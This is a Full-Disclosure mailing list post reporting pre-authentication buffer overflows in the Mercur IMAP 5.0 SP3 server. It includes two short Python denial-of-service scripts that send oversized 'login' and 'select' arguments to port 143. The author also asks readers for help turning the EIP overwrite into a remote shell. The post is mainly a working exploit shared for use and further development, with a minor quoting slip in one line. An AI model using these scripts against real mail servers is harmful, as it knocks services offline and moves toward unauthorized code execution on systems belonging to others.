Mercur IMAPD 5.0 SP3 DoS Exploit or more?

["Tim Taylor" <Tim.Taylor () gmx ch>]

Hi folks,

I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from
http://www.atrium-software.com/, but i was not able to exploit it successful
for a remote shell on WinXP ServicePack2. The program has an intern check
for the string length or something like that. I can overwrite the EIP
successfully but can not put my shellcode behind the EIP. Because of this
fact i have to write the shellcode in front of the EIP and this results in a
135 byte for the shellcode without the required "a login" or "a select".
Perhaps someone has a clue and can solve this problems and teach me some
lessons for the future.

-- DoS Exploit --
# Atrium Mercur IMAP 5.0 SP3 DoS Exploit
# pre authentifcation buffer overflow in imap command login
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login "\x41" * 275 + "\r\n")

# buffer overflow in imap commands like select and others
import socket
s=socket.socket()
s.connect(("127.0.0.1", 143))
print s.recv(256)
s.send("a001 login test test\r\n")
print s.recv(256)
s.send("a002 select " + "\x41" * 239 + "\r\n")

By the way at the first look it seems to be like some older bugs of this
piece of software but I do not think so.

Cheers

Tim Taylor

-- 
Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer!
Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/